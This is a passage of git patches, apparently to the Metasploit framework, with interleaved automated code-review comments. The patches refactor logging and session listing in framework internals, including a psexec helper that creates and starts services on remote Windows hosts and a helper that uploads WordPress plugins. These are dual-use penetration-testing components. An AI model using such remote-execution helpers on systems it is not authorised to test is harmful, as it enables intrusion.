@@ -234,18 +236,30 @@ module Exploit::Remote::Tcp datastore['LPORT'] end - # - # Returns the local host for outgoing connections - # - def chost - datastore['CHOST'] + # Returns the rhost:rport + def peer + "#{rhost}:#{rport}" end # - # Returns the local port for outgoing connections + # Returns the proxy configuration # - def cport - datastore['CPORT'] + def proxies + datastore['Proxies'] + end + + # + # Returns the target host + # + def rhost + datastore['RHOST'] + end + + # + # Returns the remote port + # + def rport + datastore['RPORT'] end # @@ -262,20 +276,6 @@ module Exploit::Remote::Tcp datastore['SSLVersion'] end - # - # Returns the proxy configuration - # - def proxies - datastore['Proxies'] - end - - # - # Returns the TCP connection timeout - # - def connect_timeout - datastore['ConnectTimeout'] - end - # # Returns the SSL certification verification mechanism # From a7869975d8b65cb85ec6509a6e98530c943be541 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 14 Jan 2016 10:04:23 -0600 Subject: [PATCH 21/71] Remove useless variable --- lib/msf/core/module/ui/message.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index 7370ded212..bf4d228abc 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -13,11 +13,11 @@ module Msf::Module::UI::Message end def print_prefix - ret = '' + prefix = '' if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i ) - prefix = "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " + prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] xn ||= framework.datastore['ExploitNumber'] @@ -25,9 +25,8 @@ module Msf::Module::UI::Message prefix << "[%04d] " % xn end - ret = prefix end - ret + prefix end def print_status(msg='') 
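Review bot: In `print_prefix` (message.rb, `@@ -13,11 +13,11 @@`), `xn ||= framework.datastore['ExploitNumber']` dereferences `framework` without the nil check that the condition just above applies (`framework && framework.datastore[...]`). When `TimestampOutput` is set in the module's own datastore, `ExploitNumber` is not, and there is no framework, printing raises NoMethodError. `xn ||= framework.datastore['ExploitNumber'] if framework` keeps the two lines consistent. Separately, `prefix << ...` now mutates the `''` literal, which would fail if the file ever adopts `# frozen_string_literal: true`; `prefix = String.new` is safe either way. The method spans this hunk and `@@ -25,9 +25,8 @@`.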
@@ -37,4 +36,4 @@ module Msf::Module::UI::Message def print_warning(msg='') super(print_prefix + msg) end -end \ No newline at end of file +end From 6c2391ed0da649d73a1e63c60f3f0744c85583b1 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 19 Jan 2016 15:37:10 +1000 Subject: [PATCH 22/71] Fix typo in random xor key generator --- lib/rex/post/meterpreter/packet.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 423f8880d2..36ae8e8ed8 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -675,8 +675,8 @@ class Packet < GroupTlv raw = super xor_key = rand(254) + 1 xor_key |= (rand(254) + 1) << 8 - xor_key |= (rand(255) + 1) << 16 - xor_key |= (rand(255) + 1) << 24 + xor_key |= (rand(254) + 1) << 16 + xor_key |= (rand(254) + 1) << 24 result = [xor_key].pack('N') + xor_bytes(xor_key, raw) result end From 0f7e3e954e6f16b810c590ced1277aedead36756 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 20 Jan 2016 13:44:18 -0600 Subject: [PATCH 23/71] HttpServer's print prefix with... wait for it... print_prefix --- lib/msf/core/exploit.rb | 4 +- lib/msf/core/exploit/http/server.rb | 59 +++-------------------------- 2 files changed, 8 insertions(+), 55 deletions(-) diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index e2d2bbc5d1..7e36ad1a80 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -649,14 +649,14 @@ class Exploit < Msf::Module # Returns true if the exploit has an aggressive stance. # def aggressive? - (stance == Stance::Aggressive) + (stance == Stance::Aggressive || stance.include?(Stance::Aggressive)) end # # Returns if the exploit has a passive stance. # def passive? - (stance == Stance::Passive) + (stance == Stance::Passive || stance.include?(Stance::Passive)) end # diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b58eb8a4a..d500a1b336 100644 
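Review bot: In the packet.rb hunk `@@ -675,8 +675,8 @@`, the key bytes come from `Kernel#rand` and the key travels in the clear in front of the data it masks, so this scheme obfuscates the TLV stream but provides neither confidentiality nor integrity. The comment above `to_r` should say so, to keep anyone from treating it as encryption. After this change every byte is drawn from 1..254, which excludes 0xFF as well as 0x00; if that is intended, a comment such as `# each key byte is 1..254: never 0x00, never 0xFF` would record it. The four near-identical lines could also be one expression, `xor_key = 4.times.reduce(0) { |k, i| k | ((rand(254) + 1) << (8 * i)) }`. `to_r` starts and ends outside the hunk.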
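Review bot: In the exploit.rb hunk `@@ -649,14 +649,14 @@`, `stance.include?(Stance::Aggressive)` means different things depending on the type of `stance`: membership for an Array, substring match for a String, and NoMethodError for nil. The result of `aggressive?` and `passive?` therefore depends on how each module declared its stance. Normalizing first, `Array(stance).include?(Stance::Aggressive)` and likewise for `Stance::Passive`, covers the scalar, list and nil cases with one test and makes the `==` comparison unnecessary. The values of the `Stance` constants are not visible here, so confirm they are not substrings of one another if String stances must keep matching as they do now.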
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -72,60 +72,13 @@ module Exploit::Remote::HttpServer Thread.current[:cli] = cli end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super + def print_prefix + if cli && !aggressive? + super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " + else + super + end end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_good(msg='') - (cli) ? 
super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # # Ensures that gzip can be used. If not, an exception is generated. The From ac0b489a90d112287825ec8e96667affb96882d8 Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 21 Jan 2016 10:28:38 +1000 Subject: [PATCH 24/71] Revert bad merge and include expect calls --- spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 8610f5d3f4..1497ebaa9e 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -19,9 +19,9 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do end it "should initialise with expected defaults" do - parser.send(:raw).to eq "" - parser.send(:hdr_length_left).to eq 12 - parser.send(:payload_length_left).to eq 0 + expect(parser.send(:raw)).to eq "" + expect(parser.send(:hdr_length_left)).to eq 12 + expect(parser.send(:payload_length_left)).to eq 0 end it "should parse valid raw data into a packet object" do From 0134161c1ba46e11a760ced9f3024e617d05b22a Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:15:13 +1000 Subject: [PATCH 25/71] Fix another typo --- lib/rex/post/meterpreter/packet.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 36ae8e8ed8..372324381f 100644 --- a/lib/rex/post/meterpreter/packet.rb 
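Review bot: The new `print_prefix` override in server.rb has no comment, while each of the ten methods it replaces carried `# Prepends client and module name if inside a thread with a #cli`. It also adds a condition the old code did not have, `!aggressive?`, which is the part a reader will want explained. A comment such as `# Prepends client address and module name when called from a thread that has a #cli, unless the module is aggressive` would cover both. Since the base print methods are outside this hunk, confirm that `print_line`, `print_good`, `print_error` and the `vprint_*` variants go through `print_prefix`. The message.rb hunks on this page show only `print_status` and `print_warning` doing so, so the others may have lost their prefix.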
+++ b/lib/rex/post/meterpreter/packet.rb @@ -693,7 +693,7 @@ class Packet < GroupTlv end # - # Xora set of bytes with a given DWORD xor key. + # Xor a set of bytes with a given DWORD xor key. # def xor_bytes(xor_key, bytes) result = '' From 69d9ff7958a636a6c05c855501cd9d10fe881d85 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 25 Jan 2016 22:32:20 +1000 Subject: [PATCH 26/71] Add an extended mode to the session list --- lib/msf/base/serializer/readable_text.rb | 12 +++++- lib/msf/ui/console/command_dispatcher/core.rb | 42 ++++++++++--------- 2 files changed, 34 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index e912cbb6f5..5b20981a9c 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,6 +524,7 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false + extended = opts[:extended] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap @@ -536,6 +537,7 @@ class ReadableText 'Information', 'Connection' ] + columns << 'Checkin?' if extended tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -552,10 +554,18 @@ class ReadableText end row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to? :platform + if session.respond_to?(:platform) row[1] << (" " + session.platform) end + if extended + if session.respond_to?(:last_checkin) && session.last_checkin + row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" + else + row << '?' + end + end + tbl << row } diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c76bd76923..e129744ff3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -34,18 +34,19 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( - "-c" => [ true, "Run a command on the session given with -i, or all"], - "-h" => [ false, "Help banner" ], - "-i" => [ true, "Interact with the supplied session ID" ], - "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List verbose fields" ], - "-q" => [ false, "Quiet mode" ], - "-k" => [ true, "Terminate sessions by session ID and/or range" ], - "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all"], - "-r" => [ false, "Reset the ring buffer for the session given with -i, or all"], - "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)"]) + "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-h" => [ false, "Help banner" ], + "-i" => [ true, "Interact with the supplied session ID " ], + "-l" => [ false, "List all active sessions" ], + "-v" => [ false, "List extended fields" ], + "-vv" => [ false, "Render in verbose mode" ], + "-q" => [ false, "Quiet mode" ], + "-k" => [ true, "Terminate sessions by session ID and/or range" ], + "-K" => [ false, "Terminate all sessions" ], + "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], + "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], + "-t" => [ true, "Set a response timeout (default: 15)" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -1757,12 +1758,13 @@ class Core # def cmd_sessions(*args) begin - method = nil - quiet = false - verbose = false - sid = nil - cmds = [] - script = nil + method = nil + quiet = false + extended = false + verbose = false + sid = nil + cmds = [] + script = nil reset_ring = false response_timeout = 15 
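Review bot: Re-purposing `-v` from "verbose" to "extended" in `@@ -34,18 +34,19 @@` (and in the `when "-v"` branch of `@@ -1780,6 +1782,8 @@`) changes the meaning of an existing option. Resource scripts and habits built on `sessions -v` will silently get a different listing; keeping `-v` as verbose and giving the extended view its own letter would avoid that. It is also worth confirming that `Rex::Parser::Arguments` matches a two-character flag like `-vv` as one option rather than as `-v` given twice, since the parser is not visible on this page. If the change is kept, the help strings `List extended fields` and `Render in verbose mode` should say what each one adds.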
@@ -1780,6 +1782,8 @@ class Core method = 'cmd' cmds << val if val when "-v" + extended = true + when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2041,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) print_line end From 537c7e790e030329c8052c188cc6450cd09001e3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 12:51:20 -0600 Subject: [PATCH 27/71] Use vprint_status instead of reimplementing it --- lib/msf/core/exploit/smtp_deliver.rb | 18 ++++++------------ 1 file changed, 6 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index a4900e8b1c..9ff8693723 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -71,7 +71,7 @@ module Exploit::Remote::SMTPDeliver # This method currently only knows about PLAIN authentication. # def connect_login(global = true) - print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") + vprint_status("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' @@ -114,7 +114,7 @@ module Exploit::Remote::SMTPDeliver else if datastore['PASSWORD'] and datastore["USERNAME"] and not datastore["USERNAME"].empty? # Let the user know their creds are going unused - print_verbose("Server didn't ask for authentication, skipping") + vprint_status("Server didn't ask for authentication, skipping") end end end @@ -170,7 +170,7 @@ module Exploit::Remote::SMTPDeliver end if not already_connected - print_verbose("Closing the connection...") + vprint_status("Closing the connection...") disconnect(nsock) end 
@@ -187,11 +187,11 @@ module Exploit::Remote::SMTPDeliver return false if not nsock if cmd =~ /AUTH PLAIN/ # Don't print the user's plaintext password - print_verbose("C: AUTH PLAIN ...") + vprint_status("C: AUTH PLAIN ...") else # Truncate because this will include a full email and we don't want # to dump it all. - print_verbose("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") + vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end nsock.put(cmd) @@ -199,17 +199,11 @@ module Exploit::Remote::SMTPDeliver # Don't truncate the server output because it might be helpful for # debugging. - print_verbose("S: #{res.strip}") if res + vprint_status("S: #{res.strip}") if res return res end - def print_verbose(msg) - if datastore['VERBOSE'] - print_status(msg) - end - end - # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 From ad026b3a7ad798e4e4db12431d05c76522b005f5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 13:58:24 -0600 Subject: [PATCH 28/71] Add #peer to Tcp --- lib/msf/core/auxiliary/scanner.rb | 5 ++ lib/msf/core/exploit/http/wordpress/admin.rb | 10 ++-- lib/msf/core/exploit/http/wordpress/base.rb | 2 +- .../core/exploit/http/wordpress/helpers.rb | 4 +- lib/msf/core/exploit/http/wordpress/posts.rb | 16 +++--- lib/msf/core/exploit/http/wordpress/users.rb | 2 +- .../core/exploit/http/wordpress/version.rb | 4 +- lib/msf/core/exploit/smb/client/psexec.rb | 52 +++++++++---------- lib/msf/core/exploit/tcp.rb | 8 +++ .../ui/console/module_command_dispatcher.rb | 8 +-- lib/rex/proto/dcerpc/svcctl/packet.rb | 18 +++---- 11 files changed, 69 insertions(+), 60 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index ac4991cbf0..43b4c4c905 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb 
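Review bot: The password masking in this hunk only triggers on the literal `AUTH PLAIN`, so any other AUTH exchange passed through here would be echoed by the `else` branch when verbose output is on. The mixin's own comment says it only knows PLAIN today, but a broader guard such as `if cmd =~ /\AAUTH\s/i` keeps credentials out of console output and saved logs if another mechanism is added later. The enclosing method starts above the hunk.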
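Review bot: Removing `print_verbose` from the mixin breaks any module that includes SMTPDeliver and calls `print_verbose` itself; such callers are not visible in this patch, so a grep across the module tree is worth doing before merge. If any exist, a temporary shim (`def print_verbose(msg); vprint_status(msg); end`) would keep them working while they are migrated.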
@@ -42,6 +42,11 @@ def check end +def peer + # IPv4 addr can be 16 chars + 1 for : and + 5 for port + super.ljust(21) +end + # # The command handler when launched from the console # diff --git a/lib/msf/core/exploit/http/wordpress/admin.rb b/lib/msf/core/exploit/http/wordpress/admin.rb index 7fc84f856c..a17f2b6058 100644 --- a/lib/msf/core/exploit/http/wordpress/admin.rb +++ b/lib/msf/core/exploit/http/wordpress/admin.rb @@ -10,10 +10,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin def wordpress_upload_plugin(name, zip, cookie) nonce = wordpress_helper_get_plugin_upload_nonce(cookie) if nonce.nil? - vprint_error("#{peer} - Failed to acquire the plugin upload nonce") + vprint_error("Failed to acquire the plugin upload nonce") return false end - vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}") + vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new @@ -32,11 +32,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin ) if res && res.code == 200 - vprint_status("#{peer} - Uploaded plugin #{name}") + vprint_status("Uploaded plugin #{name}") return true else - vprint_error("#{peer} - Server responded with code #{res.code}") if res - vprint_error("#{peer} - Failed to upload plugin #{name}") + vprint_error("Server responded with code #{res.code}") if res + vprint_error("Failed to upload plugin #{name}") return false end end diff --git a/lib/msf/core/exploit/http/wordpress/base.rb b/lib/msf/core/exploit/http/wordpress/base.rb index 386b6378f9..f25298c868 100644 --- a/lib/msf/core/exploit/http/wordpress/base.rb +++ b/lib/msf/core/exploit/http/wordpress/base.rb 
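Review bot: The comment on the new scanner `peer` says an IPv4 address can be 16 chars, but the padding width of 21 matches 15 + 1 + 5; it should read `# IPv4 addr can be 15 chars + 1 for : and + 5 for port`. `super` here also assumes every module that mixes in the scanner has a `peer` further up its ancestor chain; a scanner without the Tcp mixin would presumably raise NoMethodError, so a `defined?(super)` guard or a comment stating the requirement would help. IPv6 peers are longer than 21 and simply go unpadded, which `ljust` tolerates.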
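Review bot: The `#{peer} - ` prefixes dropped in `wordpress_upload_plugin` rely on a `print_prefix` override supplying the host, but the only one added in this commit is in `Exploit::Remote::Tcp`, and the diffstat does not touch the HTTP client mixin these WordPress helpers run under. If that mixin does not already prefix messages, output from a run against several hosts can no longer be attributed to a target, which also hurts anyone reconstructing activity from saved console logs. Please confirm before merging; the same applies to the other WordPress hunks (base, helpers, posts, users, version).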
@@ -27,7 +27,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Base return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r } return nil rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e - print_error("#{peer} - Error connecting to #{target_uri}: #{e}") + print_error("Error connecting to #{target_uri}: #{e}") return nil end end diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index a9b70dae79..206b0364c7 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -52,7 +52,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) else - message = "#{peer} - Post comment failed." + message = "Post comment failed." message << " Status Code: #{res.code}" if res print_error(message) return nil @@ -67,7 +67,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [Integer,nil] The post id, nil when nothing found def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) range.each { |id| - vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0 + vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) return id if body } diff --git a/lib/msf/core/exploit/http/wordpress/posts.rb b/lib/msf/core/exploit/http/wordpress/posts.rb index 57735bdf4a..ec0f52cff6 100644 --- a/lib/msf/core/exploit/http/wordpress/posts.rb +++ b/lib/msf/core/exploit/http/wordpress/posts.rb 
@@ -99,11 +99,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts # @param max_redirects [Integer] maximum redirects to follow # @return [Array,nil] String Array with valid blog posts, nil on error def wordpress_get_all_blog_posts_via_feed(max_redirects = 10) - vprint_status("#{peer} - Enumerating Blog posts...") + vprint_status("Enumerating Blog posts...") blog_posts = [] begin - vprint_status("#{peer} - Locating wordpress feed...") + vprint_status("Locating wordpress feed...") res = send_request_cgi({ 'uri' => wordpress_url_rss, 'method' => 'GET' @@ -116,26 +116,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts path = wordpress_helper_parse_location_header(res) return nil unless path - vprint_status("#{peer} - Web server returned a #{res.code}...following to #{path}") + vprint_status("Web server returned a #{res.code}...following to #{path}") res = send_request_cgi({ 'uri' => path, 'method' => 'GET' }) if res.code == 200 - vprint_status("#{peer} - Feed located at #{path}") + vprint_status("Feed located at #{path}") else - vprint_status("#{peer} - Returned a #{res.code}...") + vprint_status("Returned a #{res.code}...") end count = count - 1 end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return nil end if res.nil? or res.code != 200 - vprint_status("#{peer} - Did not recieve HTTP response for RSS feed") + vprint_status("Did not recieve HTTP response for RSS feed") return blog_posts end @@ -143,7 +143,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts links = res.body.scan(/([^<]+)<\/link>/i) if links.nil? or links.empty? - vprint_status("#{peer} - Feed did not have any links present") + vprint_status("Feed did not have any links present") return blog_posts end diff --git a/lib/msf/core/exploit/http/wordpress/users.rb b/lib/msf/core/exploit/http/wordpress/users.rb index 4ddac519ad..98fd963bc8 100644 
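Review bot: Inside the redirect loop of the `@@ -116,26` hunk, `if res.code == 200` is evaluated right after `res = send_request_cgi(...)` with no nil check, so a request that returns nil (which the later `res.nil?` test anticipates) raises NoMethodError that the `rescue` for Rex connection errors will not catch. Guarding with `if res && res.code == 200` and `elsif res` for the status message keeps the method on its documented nil/array return. The touched string `"Did not recieve HTTP response for RSS feed"` also carries a typo (`receive`). The method continues outside the hunk.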
--- a/lib/msf/core/exploit/http/wordpress/users.rb +++ b/lib/msf/core/exploit/http/wordpress/users.rb @@ -48,7 +48,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users end if res.nil? - print_error("#{peer} - Error getting response.") + print_error("Error getting response.") return nil elsif res.code == 200 and ( diff --git a/lib/msf/core/exploit/http/wordpress/version.rb b/lib/msf/core/exploit/http/wordpress/version.rb index 80c693e56d..3561534b49 100644 --- a/lib/msf/core/exploit/http/wordpress/version.rb +++ b/lib/msf/core/exploit/http/wordpress/version.rb @@ -134,7 +134,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version res = nil readmes.each do |readme_name| readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, readme_name) - vprint_status("#{peer} - Checking #{readme_url}") + vprint_status("Checking #{readme_url}") res = send_request_cgi( 'uri' => readme_url, 'method' => 'GET' @@ -180,7 +180,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version # Could not identify version number return Msf::Exploit::CheckCode::Detected if version.nil? - vprint_status("#{peer} - Found version #{version} of the #{item_type}") + vprint_status("Found version #{version} of the #{item_type}") if fixed_version.nil? if vuln_introduced_version.nil? diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb index bd60e6c675..cb1acf684b 100644 --- a/lib/msf/core/exploit/smb/client/psexec.rb +++ b/lib/msf/core/exploit/smb/client/psexec.rb @@ -74,7 +74,7 @@ module Exploit::Remote::SMB::Client::Psexec simple.disconnect("\\\\#{host}\\#{smbshare}") return contents rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") + print_error("Unable to read file #{file}. #{e.class}: #{e}.") return nil end end 
@@ -94,16 +94,16 @@ module Exploit::Remote::SMB::Client::Psexec def psexec(command, disconnect=true) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") + vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") + vprint_status("Bound to #{handle} ...") + vprint_status("Obtaining a service manager handle...") svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc) scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST']) if scm_status == ERROR_ACCESS_DENIED - print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager") + print_error("ERROR_ACCESS_DENIED opening the Service Manager") end return false unless scm_handle 
@@ -114,68 +114,68 @@ module Exploit::Remote::SMB::Client::Psexec opts = {} end - vprint_status("#{peer} - Creating the service...") + vprint_status("Creating the service...") svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS - vprint_good("#{peer} - Successfully created the service") + vprint_good("Successfully created the service") when ERROR_SERVICE_EXISTS service_exists = true - print_warning("#{peer} - Service already exists, opening a handle...") + print_warning("Service already exists, opening a handle...") svc_handle = svc_client.openservicew(scm_handle, service_name) when ERROR_ACCESS_DENIED - print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?") + print_error("Unable to create service, ACCESS_DENIED, did AV gobble your binary?") return false else - print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}") + print_error("Failed to create service, ERROR_CODE: #{svc_status}") return false end if svc_handle.nil? 
- print_error("#{peer} - No service handle retrieved") + print_error("No service handle retrieved") return false else if service_description - vprint_status("#{peer} - Changing service description...") + vprint_status("Changing service description...") svc_client.changeservicedescription(svc_handle, service_description) end - vprint_status("#{peer} - Starting the service...") + vprint_status("Starting the service...") begin svc_status = svc_client.startservice(svc_handle) case svc_status when ERROR_SUCCESS - print_good("#{peer} - Service started successfully...") + print_good("Service started successfully...") when ERROR_FILE_NOT_FOUND - print_error("#{peer} - Service failed to start - FILE_NOT_FOUND") + print_error("Service failed to start - FILE_NOT_FOUND") when ERROR_ACCESS_DENIED - print_error("#{peer} - Service failed to start - ACCESS_DENIED") + print_error("Service failed to start - ACCESS_DENIED") when ERROR_SERVICE_REQUEST_TIMEOUT - print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...") + print_good("Service start timed out, OK if running a command or non-service executable...") else - print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}") + print_error("Service failed to start, ERROR_CODE: #{svc_status}") end ensure begin # If service already exists don't delete it! # Maybe we could have a force cleanup option..? 
if service_exists - print_warning("#{peer} - Not removing service as it already existed...") + print_warning("Not removing service as it already existed...") elsif datastore['SERVICE_PERSIST'] - print_warning("#{peer} - Not removing service for persistance...") + print_warning("Not removing service for persistance...") else - vprint_status("#{peer} - Removing the service...") + vprint_status("Removing the service...") svc_status = svc_client.deleteservice(svc_handle) if svc_status == ERROR_SUCCESS - vprint_good("#{peer} - Successfully removed the sevice") + vprint_good("Successfully removed the sevice") else - print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}") + print_error("Unable to remove the service, ERROR_CODE: #{svc_status}") end end ensure - vprint_status("#{peer} - Closing service handle...") + vprint_status("Closing service handle...") svc_client.closehandle(svc_handle) end end @@ -189,10 +189,6 @@ module Exploit::Remote::SMB::Client::Psexec true end - def peer - "#{rhost}:#{rport}" - end - end end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 7c342a3a03..06a588005d 100644 --- a/lib/msf/core/exploit/tcp.rb +++ 